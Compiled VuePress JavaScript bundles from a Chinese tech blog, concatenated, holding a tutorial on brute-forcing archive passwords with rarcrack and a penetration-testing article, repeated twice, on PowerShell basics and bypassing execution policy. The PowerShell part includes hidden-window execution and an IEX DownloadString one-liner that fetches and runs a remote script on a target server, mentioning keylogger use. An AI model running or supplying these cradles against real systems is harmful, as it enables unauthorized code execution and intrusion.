"),a("h2",{attrs:{id:"写在最后"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#写在最后"}},[s._v("#")]),s._v(" 写在最后")]),s._v(" "),a("blockquote",[a("p",[s._v("如果你觉得冰河写的还不错,请微信搜索并关注「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!")])]),s._v(" "),a("p",[a("img",{staticClass:"lazy",attrs:{alt:"","data-src":"https://img-blog.csdnimg.cn/20200906013715889.png",loading:"lazy"}})])])}),[],!1,null,null,null);a.default=n.exports}}]);
\ No newline at end of file
(window.webpackJsonp=window.webpackJsonp||[]).push([[160],{449:function(s,a,t){"use strict";t.r(a);var r=t(7),n=Object(r.a)({},(function(){var s=this,a=s._self._c;return a("ContentSlotsDistributor",{attrs:{"slot-key":s.$parent.slotKey}},[a("h1",{attrs:{id:"使用rarcrack暴力破解rar-zip-7z压缩包"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#使用rarcrack暴力破解rar-zip-7z压缩包"}},[s._v("#")]),s._v(" 使用rarcrack暴力破解RAR,ZIP,7Z压缩包")]),s._v(" "),a("p",[s._v("这里使用的软件名称叫rarcrack,其官方主页: http://rarcrack.sourceforge.net")]),s._v(" "),a("p",[s._v("该软件用于暴力破解压缩文件的密码,但仅支持RAR, ZIP, 7Z这三种类型的压缩包,其特点是可以使用多线程,而且可以随时暂停与继续(暂停时会在当前目录生成一个xml文件,里面显示了正在尝试的一个密码)。这是真正的暴力破解,因为连字典都没用\nrarcrack安装方法")]),s._v(" "),a("p",[s._v("首先从官网下载安装包,然后执行如下命令")]),s._v(" "),a("div",{staticClass:"language-bash line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-bash"}},[a("code",[a("span",{pre:!0,attrs:{class:"token function"}},[s._v("tar")]),s._v(" "),a("span",{pre:!0,attrs:{class:"token parameter variable"}},[s._v("-xjf")]),s._v(" rarcrack-0.2.tar.bz2\n"),a("span",{pre:!0,attrs:{class:"token builtin class-name"}},[s._v("cd")]),s._v(" rarcrack-0.2\n"),a("span",{pre:!0,attrs:{class:"token function"}},[s._v("make")]),s._v(" "),a("span",{pre:!0,attrs:{class:"token operator"}},[s._v("&&")]),s._v(" "),a("span",{pre:!0,attrs:{class:"token function"}},[s._v("make")]),s._v(" "),a("span",{pre:!0,attrs:{class:"token function"}},[s._v("install")]),s._v("\n")])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br"),a("span",{staticClass:"line-number"},[s._v("2")]),a("br"),a("span",{staticClass:"line-number"},[s._v("3")]),a("br")])]),a("p",[s._v("或者直接使用下述命令安装rarcrack")]),s._v(" "),a("p",[s._v("apt-get install rarcrack")]),s._v(" "),a("p",[s._v("rarcrack使用方法")]),s._v(" "),a("p",[s._v("执行命令: rarcrack 文件名 -threads 线程数 -type rar|zip|7z")]),s._v(" "),a("p",[s._v("同时,该软件自带了测试样例,在解压目录里,执行rarcrack test.zip —threads 4 —type zip,等待一会儿即可得到结果,其密码是100,很简单。在执行过程中,还会打印当前尝试的速度,比如:")]),s._v(" "),a("div",{staticClass:"language-bash line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-bash"}},[a("code",[s._v("Probing: "),a("span",{pre:!0,attrs:{class:"token string"}},[s._v("'oB'")]),s._v(" "),a("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("[")]),a("span",{pre:!0,attrs:{class:"token number"}},[s._v("527")]),s._v(" pwds/sec"),a("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("]")]),s._v("\nProbing: "),a("span",{pre:!0,attrs:{class:"token string"}},[s._v("'Nh'")]),s._v(" "),a("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("[")]),a("span",{pre:!0,attrs:{class:"token number"}},[s._v("510")]),s._v(" pwds/sec"),a("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("]")]),s._v("\nProbing: "),a("span",{pre:!0,attrs:{class:"token string"}},[s._v("'0c3'")]),s._v(" "),a("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("[")]),a("span",{pre:!0,attrs:{class:"token number"}},[s._v("512")]),s._v(" pwds/sec"),a("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("]")]),s._v("\nProbing: "),a("span",{pre:!0,attrs:{class:"token string"}},[s._v("'0AV'")]),s._v(" "),a("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("[")]),a("span",{pre:!0,attrs:{class:"token number"}},[s._v("514")]),s._v(" pwds/sec"),a("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("]")]),s._v("\n")])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br"),a("span",{staticClass:"line-number"},[s._v("2")]),a("br"),a("span",{staticClass:"line-number"},[s._v("3")]),a("br"),a("span",{staticClass:"line-number"},[s._v("4")]),a("br")])]),a("p",[s._v("如果要改变当前密码破解的位置,可以直接打开xml,修改当前密码到那一行密码即可。xml内容如下:")]),s._v(" "),a("div",{staticClass:"language-bash line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-bash"}},[a("code",[a("span",{pre:!0,attrs:{class:"token operator"}},[s._v("<")]),s._v("?xml "),a("span",{pre:!0,attrs:{class:"token assign-left variable"}},[s._v("version")]),a("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),a("span",{pre:!0,attrs:{class:"token string"}},[s._v('"1.0"')]),s._v(" "),a("span",{pre:!0,attrs:{class:"token assign-left variable"}},[s._v("encoding")]),a("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),a("span",{pre:!0,attrs:{class:"token string"}},[s._v('"UTF-8"')]),s._v("?"),a("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v("\n"),a("span",{pre:!0,attrs:{class:"token operator"}},[s._v("<")]),s._v("rarcrack"),a("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v("\n "),a("span",{pre:!0,attrs:{class:"token operator"}},[s._v("<")]),s._v("abc"),a("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"),a("span",{pre:!0,attrs:{class:"token operator"}},[s._v("<")]),s._v("/abc"),a("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v("\n "),a("span",{pre:!0,attrs:{class:"token operator"}},[s._v("<")]),s._v("current"),a("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),a("span",{pre:!0,attrs:{class:"token number"}},[s._v("10")]),a("span",{pre:!0,attrs:{class:"token operator"}},[a("span",{pre:!0,attrs:{class:"token file-descriptor important"}},[s._v("4")]),s._v("<")]),s._v("/current"),a("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v("\n "),a("span",{pre:!0,attrs:{class:"token operator"}},[s._v("<")]),s._v("good_password"),a("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),a("span",{pre:!0,attrs:{class:"token number"}},[s._v("10")]),a("span",{pre:!0,attrs:{class:"token operator"}},[a("span",{pre:!0,attrs:{class:"token file-descriptor important"}},[s._v("0")]),s._v("<")]),s._v("/good_password"),a("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v("\n"),a("span",{pre:!0,attrs:{class:"token operator"}},[s._v("<")]),s._v("/rarcrack"),a("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v("\n")])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br"),a("span",{staticClass:"line-number"},[s._v("2")]),a("br"),a("span",{staticClass:"line-number"},[s._v("3")]),a("br"),a("span",{staticClass:"line-number"},[s._v("4")]),a("br"),a("span",{staticClass:"line-number"},[s._v("5")]),a("br"),a("span",{staticClass:"line-number"},[s._v("6")]),a("br")])]),a("p",[s._v("在执行过程中,如果出现如下错误:")]),s._v(" "),a("div",{staticClass:"language-bash line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-bash"}},[a("code",[s._v("gcc "),a("span",{pre:!0,attrs:{class:"token parameter variable"}},[s._v("-pthread")]),s._v(" rarcrack.cxml2-config "),a("span",{pre:!0,attrs:{class:"token parameter variable"}},[s._v("--libs")]),s._v(" --cflags-O2 "),a("span",{pre:!0,attrs:{class:"token parameter variable"}},[s._v("-o")]),s._v(" rarcrack \n/bin/sh: "),a("span",{pre:!0,attrs:{class:"token number"}},[s._v("1")]),s._v(": xml2-config: not found \nIn "),a("span",{pre:!0,attrs:{class:"token function"}},[s._v("file")]),s._v(" included from rarcrack.c:21:0: \nrarcrack.h:25:48: 致命错误: libxml/xmlmemory.h:没有那个文件或目录 \n编译中断。 \nmake: *** "),a("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("[")]),s._v("all"),a("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("]")]),s._v(" 错误 "),a("span",{pre:!0,attrs:{class:"token number"}},[s._v("1")]),s._v("\n")])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br"),a("span",{staticClass:"line-number"},[s._v("2")]),a("br"),a("span",{staticClass:"line-number"},[s._v("3")]),a("br"),a("span",{staticClass:"line-number"},[s._v("4")]),a("br"),a("span",{staticClass:"line-number"},[s._v("5")]),a("br"),a("span",{staticClass:"line-number"},[s._v("6")]),a("br")])]),a("p",[s._v("那么可以执行sudo apt-get install libxml2-dev libxslt-dev进行修复。")]),s._v(" "),a("h2",{attrs:{id:"写在最后"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#写在最后"}},[s._v("#")]),s._v(" 写在最后")]),s._v(" "),a("blockquote",[a("p",[s._v("如果你觉得冰河写的还不错,请微信搜索并关注「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!")])]),s._v(" "),a("p",[a("img",{staticClass:"lazy",attrs:{alt:"","data-src":"https://img-blog.csdnimg.cn/20200906013715889.png",loading:"lazy"}})])])}),[],!1,null,null,null);a.default=n.exports}}]);
\ No newline at end of file
(window.webpackJsonp=window.webpackJsonp||[]).push([[253],{544:function(e,t,s){"use strict";s.r(t);var a=s(7),r=Object(a.a)({},(function(){var e=this,t=e._self._c;return t("ContentSlotsDistributor",{attrs:{"slot-key":e.$parent.slotKey}},[t("h1",{attrs:{id:"powershell基本命令和绕过权限执行"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#powershell基本命令和绕过权限执行"}},[e._v("#")]),e._v(" PowerShell基本命令和绕过权限执行")]),e._v(" "),t("h2",{attrs:{id:"基本命令"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#基本命令"}},[e._v("#")]),e._v(" 基本命令")]),e._v(" "),t("p",[e._v("以文件操作为例")]),e._v(" "),t("h2",{attrs:{id:"新建目录"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#新建目录"}},[e._v("#")]),e._v(" 新建目录")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v("New-Item whitecellclub-ItemType Directory\n")])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("h2",{attrs:{id:"新建文件"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#新建文件"}},[e._v("#")]),e._v(" 新建文件")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v("New-Item light.txt-ItemType File\n")])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("h2",{attrs:{id:"删除目录"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#删除目录"}},[e._v("#")]),e._v(" 删除目录")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v("Remove-Item whitecellclub\n")])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("h2",{attrs:{id:"显示文件内容"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#显示文件内容"}},[e._v("#")]),e._v(" 显示文件内容")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v("Get-Content test.txt\n")])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("h2",{attrs:{id:"设置文本内容"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#设置文本内容"}},[e._v("#")]),e._v(" 设置文本内容")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v('Set-Content test.txt-Value"Hello World!"\n')])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("h2",{attrs:{id:"追加内容"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#追加内容"}},[e._v("#")]),e._v(" 追加内容")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v('Add-Content light.txt-Value"i love you"\n')])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("h2",{attrs:{id:"清除内容"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#清除内容"}},[e._v("#")]),e._v(" 清除内容")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v("Clear-Content test.txt\n")])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("h2",{attrs:{id:"执行策略"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#执行策略"}},[e._v("#")]),e._v(" 执行策略")]),e._v(" "),t("p",[e._v("获取执行策略")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v("Get-ExecutionPolicy\n")])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("p",[e._v("策略分以下几种:")]),e._v(" "),t("ul",[t("li",[e._v("Restricted: 脚本不能执行(默认)")]),e._v(" "),t("li",[e._v("RemoteSigned: 本地创建的脚本可以运行,但从网上下载的脚本不能运行(拥有数字证书签名的除外)。")]),e._v(" "),t("li",[e._v("AllSigned: 仅当脚本由受信任的发布者签名时才能运行。")]),e._v(" "),t("li",[e._v("Unrestricted: 允许所有的script运行")])]),e._v(" "),t("p",[e._v("可以使用如下命令格式设置PowerShell的执行策略")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v("Set-ExecutionPolicy <Policy name>\n")])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("h2",{attrs:{id:"绕过策略来执行脚本"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#绕过策略来执行脚本"}},[e._v("#")]),e._v(" 绕过策略来执行脚本")]),e._v(" "),t("p",[e._v("如果要运行PowerShell脚本程序,必须用管理员权限将Restricted策略改成Unrestricted,所以,在渗透时,需要采用一些方法绕过策略来执行脚本")]),e._v(" "),t("h2",{attrs:{id:"绕过本地权限执行"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#绕过本地权限执行"}},[e._v("#")]),e._v(" 绕过本地权限执行")]),e._v(" "),t("p",[e._v("上传xxx.ps1到目标服务器,在CMD环境下,在目标服务器本地执行该脚本")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v("PowerShell.exe-ExecutionPolicy Bypass-File xxx.ps1\n")])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("h2",{attrs:{id:"本地隐藏绕过权限执行脚本"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#本地隐藏绕过权限执行脚本"}},[e._v("#")]),e._v(" 本地隐藏绕过权限执行脚本")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v("PowerShell.exe-ExecutionPolicy Bypass-WindowStyle Hidden-NoLogo-NonInteractive-NoProfile-File xxx.ps1\n")])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("h2",{attrs:{id:"用iex下载远程ps1脚本绕过权限执行"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#用iex下载远程ps1脚本绕过权限执行"}},[e._v("#")]),e._v(" 用IEX下载远程PS1脚本绕过权限执行")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v('PowerShell.exe-ExecutionPolicy Bypass-WindowStyle Hidden-NoProfile-Nonl IEX (New-ObjectNet.WebClient).DownloadString("xxx.ps1");[Parameters]\n')])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("p",[e._v("以上命令的参数说明:")]),e._v(" "),t("ul",[t("li",[e._v("ExecutionPolicy Bypass : 绕过执行安全策略,这个参数非常重要,在默认情况下,PowerShell的安全策略规定了PowerShell不允许运行命令和文件。通过设置这个参数,可以绕过任意一个安全规则。在渗透测试中,基本每一次运行PowerShell脚本时都要使用这个参数。")]),e._v(" "),t("li",[e._v("WindowStyle Hidden : 隐藏窗口")]),e._v(" "),t("li",[e._v("NoLogo : 启动不显示版权标志的PowerShell")]),e._v(" "),t("li",[e._v("NonInteractive (-Nonl) : 非交互模式,PowerShell不为用户提供交互的提示")]),e._v(" "),t("li",[e._v("NoProfile (-Nop): PowerShell控制台不加载当前用户的配置文件")]),e._v(" "),t("li",[e._v("Noexit : 执行后不退出Shell。这在使用键盘记录等脚本时非常重要。")]),e._v(" "),t("li",[e._v("PowerShell脚本在默认情况下无法直接运行,这时就可以使用上述三种方法绕过安全策略,运行PowerShell脚本。")])]),e._v(" "),t("h2",{attrs:{id:"写在最后"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#写在最后"}},[e._v("#")]),e._v(" 写在最后")]),e._v(" "),t("blockquote",[t("p",[e._v("如果你觉得冰河写的还不错,请微信搜索并关注「 "),t("strong",[e._v("冰河技术")]),e._v(" 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 "),t("strong",[e._v("冰河技术")]),e._v(" 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 "),t("strong",[e._v("冰河技术")]),e._v(" 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 "),t("strong",[e._v("冰河技术")]),e._v(" 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!")])]),e._v(" "),t("p",[t("img",{staticClass:"lazy",attrs:{alt:"","data-src":"https://img-blog.csdnimg.cn/20200906013715889.png",loading:"lazy"}})])])}),[],!1,null,null,null);t.default=r.exports}}]);
\ No newline at end of file
(window.webpackJsonp=window.webpackJsonp||[]).push([[253],{543:function(e,t,s){"use strict";s.r(t);var a=s(7),r=Object(a.a)({},(function(){var e=this,t=e._self._c;return t("ContentSlotsDistributor",{attrs:{"slot-key":e.$parent.slotKey}},[t("h1",{attrs:{id:"powershell基本命令和绕过权限执行"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#powershell基本命令和绕过权限执行"}},[e._v("#")]),e._v(" PowerShell基本命令和绕过权限执行")]),e._v(" "),t("h2",{attrs:{id:"基本命令"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#基本命令"}},[e._v("#")]),e._v(" 基本命令")]),e._v(" "),t("p",[e._v("以文件操作为例")]),e._v(" "),t("h2",{attrs:{id:"新建目录"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#新建目录"}},[e._v("#")]),e._v(" 新建目录")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v("New-Item whitecellclub-ItemType Directory\n")])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("h2",{attrs:{id:"新建文件"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#新建文件"}},[e._v("#")]),e._v(" 新建文件")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v("New-Item light.txt-ItemType File\n")])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("h2",{attrs:{id:"删除目录"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#删除目录"}},[e._v("#")]),e._v(" 删除目录")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v("Remove-Item whitecellclub\n")])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("h2",{attrs:{id:"显示文件内容"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#显示文件内容"}},[e._v("#")]),e._v(" 显示文件内容")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v("Get-Content test.txt\n")])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("h2",{attrs:{id:"设置文本内容"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#设置文本内容"}},[e._v("#")]),e._v(" 设置文本内容")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v('Set-Content test.txt-Value"Hello World!"\n')])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("h2",{attrs:{id:"追加内容"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#追加内容"}},[e._v("#")]),e._v(" 追加内容")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v('Add-Content light.txt-Value"i love you"\n')])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("h2",{attrs:{id:"清除内容"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#清除内容"}},[e._v("#")]),e._v(" 清除内容")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v("Clear-Content test.txt\n")])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("h2",{attrs:{id:"执行策略"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#执行策略"}},[e._v("#")]),e._v(" 执行策略")]),e._v(" "),t("p",[e._v("获取执行策略")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v("Get-ExecutionPolicy\n")])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("p",[e._v("策略分以下几种:")]),e._v(" "),t("ul",[t("li",[e._v("Restricted: 脚本不能执行(默认)")]),e._v(" "),t("li",[e._v("RemoteSigned: 本地创建的脚本可以运行,但从网上下载的脚本不能运行(拥有数字证书签名的除外)。")]),e._v(" "),t("li",[e._v("AllSigned: 仅当脚本由受信任的发布者签名时才能运行。")]),e._v(" "),t("li",[e._v("Unrestricted: 允许所有的script运行")])]),e._v(" "),t("p",[e._v("可以使用如下命令格式设置PowerShell的执行策略")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v("Set-ExecutionPolicy <Policy name>\n")])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("h2",{attrs:{id:"绕过策略来执行脚本"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#绕过策略来执行脚本"}},[e._v("#")]),e._v(" 绕过策略来执行脚本")]),e._v(" "),t("p",[e._v("如果要运行PowerShell脚本程序,必须用管理员权限将Restricted策略改成Unrestricted,所以,在渗透时,需要采用一些方法绕过策略来执行脚本")]),e._v(" "),t("h2",{attrs:{id:"绕过本地权限执行"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#绕过本地权限执行"}},[e._v("#")]),e._v(" 绕过本地权限执行")]),e._v(" "),t("p",[e._v("上传xxx.ps1到目标服务器,在CMD环境下,在目标服务器本地执行该脚本")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v("PowerShell.exe-ExecutionPolicy Bypass-File xxx.ps1\n")])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("h2",{attrs:{id:"本地隐藏绕过权限执行脚本"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#本地隐藏绕过权限执行脚本"}},[e._v("#")]),e._v(" 本地隐藏绕过权限执行脚本")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v("PowerShell.exe-ExecutionPolicy Bypass-WindowStyle Hidden-NoLogo-NonInteractive-NoProfile-File xxx.ps1\n")])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("h2",{attrs:{id:"用iex下载远程ps1脚本绕过权限执行"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#用iex下载远程ps1脚本绕过权限执行"}},[e._v("#")]),e._v(" 用IEX下载远程PS1脚本绕过权限执行")]),e._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[e._v('PowerShell.exe-ExecutionPolicy Bypass-WindowStyle Hidden-NoProfile-Nonl IEX (New-ObjectNet.WebClient).DownloadString("xxx.ps1");[Parameters]\n')])]),e._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[e._v("1")]),t("br")])]),t("p",[e._v("以上命令的参数说明:")]),e._v(" "),t("ul",[t("li",[e._v("ExecutionPolicy Bypass : 绕过执行安全策略,这个参数非常重要,在默认情况下,PowerShell的安全策略规定了PowerShell不允许运行命令和文件。通过设置这个参数,可以绕过任意一个安全规则。在渗透测试中,基本每一次运行PowerShell脚本时都要使用这个参数。")]),e._v(" "),t("li",[e._v("WindowStyle Hidden : 隐藏窗口")]),e._v(" "),t("li",[e._v("NoLogo : 启动不显示版权标志的PowerShell")]),e._v(" "),t("li",[e._v("NonInteractive (-Nonl) : 非交互模式,PowerShell不为用户提供交互的提示")]),e._v(" "),t("li",[e._v("NoProfile (-Nop): PowerShell控制台不加载当前用户的配置文件")]),e._v(" "),t("li",[e._v("Noexit : 执行后不退出Shell。这在使用键盘记录等脚本时非常重要。")]),e._v(" "),t("li",[e._v("PowerShell脚本在默认情况下无法直接运行,这时就可以使用上述三种方法绕过安全策略,运行PowerShell脚本。")])]),e._v(" "),t("h2",{attrs:{id:"写在最后"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#写在最后"}},[e._v("#")]),e._v(" 写在最后")]),e._v(" "),t("blockquote",[t("p",[e._v("如果你觉得冰河写的还不错,请微信搜索并关注「 "),t("strong",[e._v("冰河技术")]),e._v(" 